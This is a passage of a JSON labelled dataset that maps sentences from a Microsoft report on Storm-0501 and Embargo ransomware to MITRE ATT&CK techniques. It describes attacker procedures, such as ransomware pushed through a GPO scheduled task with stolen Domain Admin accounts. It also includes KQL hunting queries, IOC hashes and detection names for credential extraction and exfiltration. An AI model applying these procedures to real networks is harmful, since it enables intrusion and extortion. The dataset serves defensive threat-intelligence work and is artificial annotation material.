"Data Encrypted for Impact" } ], "procedure": "They encrypt victim files and then threaten to leak stolen data to extort payment.", "entities": [ { "text": "Embargo affiliates ", "start": 0, "end": 19, "label": "ThreatActor" }, { "text": "encrypt a victim’s files", "start": 69, "end": 93, "label": "Action" }, { "text": "threaten to leak stolen sensitive data ", "start": 98, "end": 137, "label": "Action" }, { "text": "employ double extortion tactics", "start": 19, "end": 50, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s70-f754ad", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 70, "context_before": "Embargo affiliates employ double extortion tactics, where they first encrypt a victim’s files and threaten to leak stolen sensitive data unless a ransom is paid.", "sentence_text": "In the cases observed by Microsoft, the threat actor leveraged compromised Domain Admin accounts to distribute the Embargo ransomware via a scheduled task named “SysUpdate” that was registered via GPO on the devices in the network.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task" } ], "procedure": "Used compromised Domain Admin accounts to push the Embargo ransomware through a GPO-registered scheduled task named “SysUpdate.”", "entities": [ { "text": "threat actor ", "start": 40, "end": 53, "label": "ThreatActor" }, { "text": "Embargo ransomware", "start": 115, "end": 133, "label": "MalwareTool" }, { "text": "leveraged compromised Domain Admin accounts", "start": 53, "end": 96, "label": "Action" }, { "text": "distribute the Embargo ransomware", "start": 100, "end": 133, "label": "Action" }, { "text": "registered via GPO", "start": 182, "end": 200, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s71-cd2be0", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 71, "context_before": "In the cases observed by Microsoft, the threat actor leveraged compromised Domain Admin accounts to distribute the Embargo ransomware via a scheduled task named “SysUpdate” that was registered via GPO on the devices in the network.", "sentence_text": "The ransomware binaries names that were used were PostalScanImporter.exe and win.exe .", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Identified ransomware binaries named PostalScanImporter.exe and win.exe used in the attack.", "entities": [ { "text": "PostalScanImporter.exe", "start": 50, "end": 72, "label": "MalwareTool" }, { "text": " win.exe .", "start": 76, "end": 86, "label": "MalwareTool" } ] }, { "uid": "mitre-85_mitre_report-p1-s72-aad128", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 72, "context_before": "The ransomware binaries names that were used were PostalScanImporter.exe and win.exe .", "sentence_text": "This change helps prevent threat actors from abusing Directory Synchronization Accounts in attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s73-1c9ff2", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 73, "context_before": "This change helps prevent threat actors from abusing Directory Synchronization Accounts in attacks.", "sentence_text": "Customers may also refer to for general hardening recommendations against ransomware attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s74-40a046", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 74, "context_before": "Customers may also refer to for general hardening recommendations against ransomware attacks.", "sentence_text": "The other techniques used by threat actors and described in this blog can be mitigated by adopting the following security measures:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s75-c43f89", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 75, "context_before": "The other techniques used by threat actors and described in this blog can be mitigated by adopting the following security measures:", "sentence_text": "Secure accounts with credential hygiene: practice the principle of least privilege and audit privileged account activity in your Microsoft Entra ID environments to slow and stop attackers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s76-8d383a", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 76, "context_before": "Secure accounts with credential hygiene: practice the principle of least privilege and audit privileged account activity in your Microsoft Entra ID environments to slow and stop attackers.", "sentence_text": "Enable Conditional Access policies – Conditional Access policies are evaluated and enforced every time the user attempts to sign in.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s77-ad2707", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "Enable Conditional Access policies – Conditional Access policies are evaluated and enforced every time the user attempts to sign in.", "sentence_text": "Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as device compliance or trusted IP address requirements.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s78-d0fe0f", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 78, "context_before": "Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as device compliance or trusted IP address requirements.", "sentence_text": "Set a Conditional Access policy to limit the access of Microsoft Entra ID sync accounts from untrusted IP addresses to all cloud apps.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s79-abb0f1", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 79, "context_before": "Set a Conditional Access policy to limit the access of Microsoft Entra ID sync accounts from untrusted IP addresses to all cloud apps.", "sentence_text": "The Microsoft Entra ID sync account is identified by having the role ‘Directory Synchronization Accounts’.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s80-c64b1f", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 80, "context_before": "The Microsoft Entra ID sync account is identified by having the role ‘Directory Synchronization Accounts’.", "sentence_text": "Please refer to the Advanced Hunting section and check the relevant query to get those IP addresses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s81-7abe5e", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 81, "context_before": "Please refer to the Advanced Hunting section and check the relevant query to get those IP addresses.", "sentence_text": "Implement\nConditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s82-d7db55", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 82, "context_before": "Implement\nConditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.", "sentence_text": "Ensure\non for your organization to receive alerts on the Microsoft Entra ID sync account and all other users.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s83-d2a1a9", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 83, "context_before": "Ensure\non for your organization to receive alerts on the Microsoft Entra ID sync account and all other users.", "sentence_text": "Enable protection\nto prevent by-passing of cloud Microsoft Entra MFA when federated with Microsoft Entra ID.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s84-a727de", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 84, "context_before": "Enable protection\nto prevent by-passing of cloud Microsoft Entra MFA when federated with Microsoft Entra ID.", "sentence_text": "Set the\nvalidatingDomains\nproperty of\nfederatedTokenValidationPolicy\nto “\nall\n” to block attempts to sign-in to any non-federated domain (like .onmicrosoft.com) with SAML tokens.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s85-1d7e80", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 85, "context_before": "Set the\nvalidatingDomains\nproperty of\nfederatedTokenValidationPolicy\nto “\nall\n” to block attempts to sign-in to any non-federated domain (like .onmicrosoft.com) with SAML tokens.", "sentence_text": "Turn on Microsoft Entra ID protection to monitor identity-based risks and create risk-based conditional access policies to remediate risky sign-ins.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s86-cd75d8", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 86, "context_before": "Turn on Microsoft Entra ID protection to monitor identity-based risks and create risk-based conditional access policies to remediate risky sign-ins.", "sentence_text": "Turn on\ntamper protection\nfeatures to prevent attackers from stopping security services such as Microsoft Defender for Endpoint, which can help prevent hybrid cloud environment attacks such as Microsoft Entra Connect abuse.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s87-244086", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 87, "context_before": "Turn on\ntamper protection\nfeatures to prevent attackers from stopping security services such as Microsoft Defender for Endpoint, which can help prevent hybrid cloud environment attacks such as Microsoft Entra Connect abuse.", "sentence_text": "Refer to the recommendations in our attacker technique profile , including use of Windows Defender Application Control or AppLocker to create policies to block unapproved information technology (IT) management tools to protect against the abuse of legitimate remote management tools like AnyDesk or Level.io.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s88-a7908a", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 88, "context_before": "Refer to the recommendations in our attacker technique profile , including use of Windows Defender Application Control or AppLocker to create policies to block unapproved information technology (IT) management tools to protect against the abuse of legitimate remote management tools like AnyDesk or Level.io.", "sentence_text": "Run\nendpoint detection and response (EDR)\nin block mode so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s89-481e1a", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 89, "context_before": "Run\nendpoint detection and response (EDR)\nin block mode so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode.", "sentence_text": "EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s90-1596bd", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 90, "context_before": "EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.", "sentence_text": "Turn on\ninvestigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to help remediate alerts, significantly reducing alert volume.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s91-5cd013", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 91, "context_before": "Turn on\ninvestigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to help remediate alerts, significantly reducing alert volume.", "sentence_text": "Detection details\nAlerts with the following names can be in use when investigating the current campaign of Storm-0501.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s92-79765a", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 92, "context_before": "Detection details\nAlerts with the following names can be in use when investigating the current campaign of Storm-0501.", "sentence_text": "Behavior:Win32/CobaltStrike\nBackdoor:Win64/CobaltStrike\nHackTool:Win64/CobaltStrike\nAdditional Cobalt Strike components are detected as the following:\nTrojanDropper:PowerShell/Cobacis\nTrojan:Win64/TurtleLoader.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s93-25fce2", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 93, "context_before": "Behavior:Win32/CobaltStrike\nBackdoor:Win64/CobaltStrike\nHackTool:Win64/CobaltStrike\nAdditional Cobalt Strike components are detected as the following:\nTrojanDropper:PowerShell/Cobacis\nTrojan:Win64/TurtleLoader.", "sentence_text": "CS\nExploit:Win32/ShellCode.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s94-bc0125", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 94, "context_before": "CS\nExploit:Win32/ShellCode.", "sentence_text": "BN\nBackdoor:Win32/SuspAadInternalsUsage\nEmbargo Ransomware threat components are detected as the following:\nRansom:Win32/Embargo\nAlerts with the following titles in the security center can indicate threat activity related to Storm-0501 on your network:\nRansomware-linked Storm-0501 threat actor detected The following alerts might also indicate threat activity associated with this threat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s95-cf5cfc", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 95, "context_before": "BN\nBackdoor:Win32/SuspAadInternalsUsage\nEmbargo Ransomware threat components are detected as the following:\nRansom:Win32/Embargo\nAlerts with the following titles in the security center can indicate threat activity related to Storm-0501 on your network:\nRansomware-linked Storm-0501 threat actor detected The following alerts might also indicate threat activity associated with this threat.", "sentence_text": "Possible Adobe ColdFusion vulnerability exploitation Compromised account conducting hands-on-keyboard attack Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s96-49b65c", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 96, "context_before": "Possible Adobe ColdFusion vulnerability exploitation Compromised account conducting hands-on-keyboard attack Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)", "sentence_text": "Ongoing hands-on-keyboard attack via Impacket toolkit Suspicious Microsoft Defender Antivirus exclusion Attempt to turn off Microsoft Defender Antivirus protection Renaming of legitimate tools for possible data exfiltration BlackCat ransomware ‘Embargo’ ransomware was detected and was active Suspicious Group Policy action detected An active ‘Embargo’ ransomware was detected The following alerts might indicate on-premises to cloud pivot through Microsoft Entra Connect:\nEntra Connect Sync credentials extraction attempt Suspicious cmdlets launch using AADInternals Potential Entra Connect Tampering Indication of local security authority secrets theft", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s97-8aa072", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 97, "context_before": "Ongoing hands-on-keyboard attack via Impacket toolkit Suspicious Microsoft Defender Antivirus exclusion Attempt to turn off Microsoft Defender Antivirus protection Renaming of legitimate tools for possible data exfiltration BlackCat ransomware ‘Embargo’ ransomware was detected and was active Suspicious Group Policy action detected An active ‘Embargo’ ransomware was detected The following alerts might indicate on-premises to cloud pivot through Microsoft Entra Connect:\nEntra Connect Sync credentials extraction attempt Suspicious cmdlets launch using AADInternals Potential Entra Connect Tampering Indication of local security authority secrets theft", "sentence_text": "The following Microsoft Defender for Identity alerts can indicate activity related to this threat:\nData exfiltration over SMB Suspected DCSync attack Backdoor creation using AADInternals tool Compromised Microsoft Entra ID Cloud Sync account Suspicious sign-in to Microsoft Entra Connect Sync account Entra Connect Sync account suspicious activity following a suspicious login AADInternals tool used by a Microsoft Entra Sync account Suspicious login from AADInternals tool CVE-2022-47966 Threat intelligence reports Storm-0501 Advanced hunting Explore sign-in activity from IdentityLogonEvents, look for uncommon behavior, such as sign-ins from newly seen IP addresses or sign-ins to new applications that are non-sync related.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s98-cd5f94", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 98, "context_before": "The following Microsoft Defender for Identity alerts can indicate activity related to this threat:\nData exfiltration over SMB Suspected DCSync attack Backdoor creation using AADInternals tool Compromised Microsoft Entra ID Cloud Sync account Suspicious sign-in to Microsoft Entra Connect Sync account Entra Connect Sync account suspicious activity following a suspicious login AADInternals tool used by a Microsoft Entra Sync account Suspicious login from AADInternals tool CVE-2022-47966 Threat intelligence reports Storm-0501 Advanced hunting Explore sign-in activity from IdentityLogonEvents, look for uncommon behavior, such as sign-ins from newly seen IP addresses or sign-ins to new applications that are non-sync related.", "sentence_text": "IdentityLogonEvents\n| where Timestamp > ago(30d)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s99-989788", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 99, "context_before": "IdentityLogonEvents\n| where Timestamp > ago(30d)", "sentence_text": "| where AccountDisplayName contains \"On-Premises Directory Synchronization Service Account\" | extend ApplicationName = tostring(RawEventData.ApplicationName)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s100-bfb2b1", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 100, "context_before": "| where AccountDisplayName contains \"On-Premises Directory Synchronization Service Account\" | extend ApplicationName = tostring(RawEventData.ApplicationName)", "sentence_text": "Cloud applications that normally accessed by the Microsoft Entra ID sync account are “Microsoft Azure Active Directory Connect”, “Windows Azure Active Directory”, “Microsoft Online Syndication Partner Portal” Explore the cloud activity (a.k.a ActionType) of the sync account, same as above, this account by nature performs a certain set of actions including ‘update User.’, ‘update Device.’", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s101-78c773", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 101, "context_before": "Cloud applications that normally accessed by the Microsoft Entra ID sync account are “Microsoft Azure Active Directory Connect”, “Windows Azure Active Directory”, “Microsoft Online Syndication Partner Portal” Explore the cloud activity (a.k.a ActionType) of the sync account, same as above, this account by nature performs a certain set of actions including ‘update User.’, ‘update Device.’", "sentence_text": "and so on.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s102-1664bc", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 102, "context_before": "and so on.", "sentence_text": "New and uncommon activity from this user might indicate an interactive use of the account, even though it could have been from someone inside the organization it could also be the threat actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s103-c40524", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 103, "context_before": "New and uncommon activity from this user might indicate an interactive use of the account, even though it could have been from someone inside the organization it could also be the threat actor.", "sentence_text": "CloudAppEvents\n| where Timestamp > ago(30d)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s104-ebffe9", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 104, "context_before": "CloudAppEvents\n| where Timestamp > ago(30d)", "sentence_text": "Check which IP addresses Microsoft Entra Connect Sync account uses This query reveals all IP addresses that the default Microsoft Entra Connect Sync account uses so those could be added as trusted IP addresses for the Entra ID sync account (make sure the account is not compromised before relying on this list)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s105-1e84dd", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 105, "context_before": "Check which IP addresses Microsoft Entra Connect Sync account uses This query reveals all IP addresses that the default Microsoft Entra Connect Sync account uses so those could be added as trusted IP addresses for the Entra ID sync account (make sure the account is not compromised before relying on this list)", "sentence_text": "IdentityLogonEvents\n| where AccountDisplayName has \"On-Premises Directory Synchronization Service Account\" | where ActionType == \"LogonSuccess\" | distinct IPAddress | union (CloudAppEvents | where AccountDisplayName has \"On-Premises Directory Synchronization Service Account\" | distinct IPAddress)\n| distinct IPAddress Federation and authentication domain changes Explore the addition of a new authentication or federation domain, validate that the new domain is valid one and was purposefully added CloudAppEvents | where Timestamp > ago(30d)\n| where ActionType in (\"Set domain authentication.\", \"Set federation settings on domain.\")\nto have the analytics rule deployed in their Sentinel workspace.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s106-da9d8c", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 106, "context_before": "IdentityLogonEvents\n| where AccountDisplayName has \"On-Premises Directory Synchronization Service Account\" | where ActionType == \"LogonSuccess\" | distinct IPAddress | union (CloudAppEvents | where AccountDisplayName has \"On-Premises Directory Synchronization Service Account\" | distinct IPAddress)\n| distinct IPAddress Federation and authentication domain changes Explore the addition of a new authentication or federation domain, validate that the new domain is valid one and was purposefully added CloudAppEvents | where Timestamp > ago(30d)\n| where ActionType in (\"Set domain authentication.\", \"Set federation settings on domain.\")\nto have the analytics rule deployed in their Sentinel workspace.", "sentence_text": "Assess your environment for Manage Engine, Netscaler, and ColdFusion vulnerabilities.\nDeviceTvmSoftwareVulnerabilities\n| where CveId in (\"CVE-2022-47966\",\"CVE-2023-4966\",\"CVE-2023-29300\",\"CVE-2023-38203\")\n| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion, CveId,VulnerabilitySeverityLevel | join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId, CvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware ) on CveId | project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion, CveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware Search for file IOC let selectedTimestamp = datetime(2024-09-17T00:00:00.0000000Z);\nlet fileName = dynamic([\"PostalScanImporter.exe\",\"win.exe\",\"name.dll\",\"248.dll\",\"cs240.dll\",\"fel.ocx\",\"theme.ocx\",\"hana.ocx\",\"obfs.ps1\",\"recon.ps1\"]);\nlet FileSHA256 = dynamic([\"efb2f6452d7b0a63f6f2f4d8db49433259249df598391dd79f64df1ee3880a8d\",\"a9aeb861817f3e4e74134622cbe298909e28d0fcc1e72f179a32adc637293a40\",\"caa21a8f13a0b77ff5808ad7725ff3af9b74ce5b67426c84538b8fa43820a031\",\"53e2dec3e16a0ff000a8c8c279eeeca8b4437edb8ec8462bfbd9f64ded8072d9\",\"827f7178802b2e92988d7cff349648f334bc86317b0b628f4bb9264285fccf5f\",\"ee80f3e3ad43a283cbc83992e235e4c1b03ff3437c880be02ab1d15d92a8348a\",\"de09ec092b11a1396613846f6b082e1e1ee16ea270c895ec6e4f553a13716304\",\"d065623a7d943c6e5a20ca9667aa3c41e639e153600e26ca0af5d7c643384670\",\"c08dd490860b54ae20fa9090274da9ffa1ba163f00d1e462e913cf8c68c11ac1\"]);\nsearch in (AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceBaselineComplianceProfiles,DeviceEvents,DeviceFileEvents,DeviceImageLoadEvents, DeviceLogonEvents,DeviceNetworkEvents,DeviceProcessEvents,DeviceRegistryEvents,DeviceFileCertificateInfo,DynamicEventCollection,EmailAttachmentInfo,OfficeActivity,SecurityEvent,ThreatIntelligenceIndicator)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s107-4e422d", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 107, "context_before": "Assess your environment for Manage Engine, Netscaler, and ColdFusion vulnerabilities.\nDeviceTvmSoftwareVulnerabilities\n| where CveId in (\"CVE-2022-47966\",\"CVE-2023-4966\",\"CVE-2023-29300\",\"CVE-2023-38203\")\n| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion, CveId,VulnerabilitySeverityLevel | join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId, CvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware ) on CveId | project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion, CveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware Search for file IOC let selectedTimestamp = datetime(2024-09-17T00:00:00.0000000Z);\nlet fileName = dynamic([\"PostalScanImporter.exe\",\"win.exe\",\"name.dll\",\"248.dll\",\"cs240.dll\",\"fel.ocx\",\"theme.ocx\",\"hana.ocx\",\"obfs.ps1\",\"recon.ps1\"]);\nlet FileSHA256 = dynamic([\"efb2f6452d7b0a63f6f2f4d8db49433259249df598391dd79f64df1ee3880a8d\",\"a9aeb861817f3e4e74134622cbe298909e28d0fcc1e72f179a32adc637293a40\",\"caa21a8f13a0b77ff5808ad7725ff3af9b74ce5b67426c84538b8fa43820a031\",\"53e2dec3e16a0ff000a8c8c279eeeca8b4437edb8ec8462bfbd9f64ded8072d9\",\"827f7178802b2e92988d7cff349648f334bc86317b0b628f4bb9264285fccf5f\",\"ee80f3e3ad43a283cbc83992e235e4c1b03ff3437c880be02ab1d15d92a8348a\",\"de09ec092b11a1396613846f6b082e1e1ee16ea270c895ec6e4f553a13716304\",\"d065623a7d943c6e5a20ca9667aa3c41e639e153600e26ca0af5d7c643384670\",\"c08dd490860b54ae20fa9090274da9ffa1ba163f00d1e462e913cf8c68c11ac1\"]);\nsearch in (AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceBaselineComplianceProfiles,DeviceEvents,DeviceFileEvents,DeviceImageLoadEvents, DeviceLogonEvents,DeviceNetworkEvents,DeviceProcessEvents,DeviceRegistryEvents,DeviceFileCertificateInfo,DynamicEventCollection,EmailAttachmentInfo,OfficeActivity,SecurityEvent,ThreatIntelligenceIndicator)", "sentence_text": "TimeGenerated between ((selectedTimestamp - 1m) ..", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s108-54c0dd", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 108, "context_before": "TimeGenerated between ((selectedTimestamp - 1m) ..", "sentence_text": "(selectedTimestamp + 90d))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s109-c5b9ee", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 109, "context_before": "(selectedTimestamp + 90d))", "sentence_text": "// from September 17th runs the search for 90 days, change the selectedTimestamp accordingly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s110-612594", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 110, "context_before": "// from September 17th runs the search for 90 days, change the selectedTimestamp accordingly.", "sentence_text": "and (FileName in (fileName) or OldFileName in (fileName) or ProfileName in (fileName) or InitiatingProcessFileName in (fileName) or InitiatingProcessParentFileName in (fileName) or InitiatingProcessVersionInfoInternalFileName in (fileName) or InitiatingProcessVersionInfoOriginalFileName in (fileName) or PreviousFileName in (fileName) or ProcessVersionInfoInternalFileName in (fileName) or ProcessVersionInfoOriginalFileName in (fileName) or DestinationFileName in (fileName) or SourceFileName in (fileName)or ServiceFileName in (fileName) or SHA256 in (FileSHA256) or InitiatingProcessSHA256 in (FileSHA256))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s111-1a1dc7", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 111, "context_before": "and (FileName in (fileName) or OldFileName in (fileName) or ProfileName in (fileName) or InitiatingProcessFileName in (fileName) or InitiatingProcessParentFileName in (fileName) or InitiatingProcessVersionInfoInternalFileName in (fileName) or InitiatingProcessVersionInfoOriginalFileName in (fileName) or PreviousFileName in (fileName) or ProcessVersionInfoInternalFileName in (fileName) or ProcessVersionInfoOriginalFileName in (fileName) or DestinationFileName in (fileName) or SourceFileName in (fileName)or ServiceFileName in (fileName) or SHA256 in (FileSHA256) or InitiatingProcessSHA256 in (FileSHA256))", "sentence_text": "Remote Management Monitoring Network Connections Level.io RMM File Signature AnyDesk RMM File Signature NinjaOne RMM File Signature Potential Impacket Execution Potential ransomware activity related to Cobalt Strike Cobalt DNS Beacon C2-NamedPipe Renamed Rclone Exfiltration Disable Or Modify Windows Defender Clearing of forensic evidence from event logs using wevtutil Suspicious Signin By AAD Connect Account Indicators of compromise (IOCs)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s112-d2f4b1", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 112, "context_before": "Remote Management Monitoring Network Connections Level.io RMM File Signature AnyDesk RMM File Signature NinjaOne RMM File Signature Potential Impacket Execution Potential ransomware activity related to Cobalt Strike Cobalt DNS Beacon C2-NamedPipe Renamed Rclone Exfiltration Disable Or Modify Windows Defender Clearing of forensic evidence from event logs using wevtutil Suspicious Signin By AAD Connect Account Indicators of compromise (IOCs)", "sentence_text": "The following list provides indicators of compromise (IOCs) observed during our investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s113-469680", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 113, "context_before": "The following list provides indicators of compromise (IOCs) observed during our investigation.", "sentence_text": "We encourage our customers to investigate these indicators within their environments and implement detections and protections to identify any past related activity and prevent future attacks against their systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s114-536993", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 114, "context_before": "We encourage our customers to investigate these indicators within their environments and implement detections and protections to identify any past related activity and prevent future attacks against their 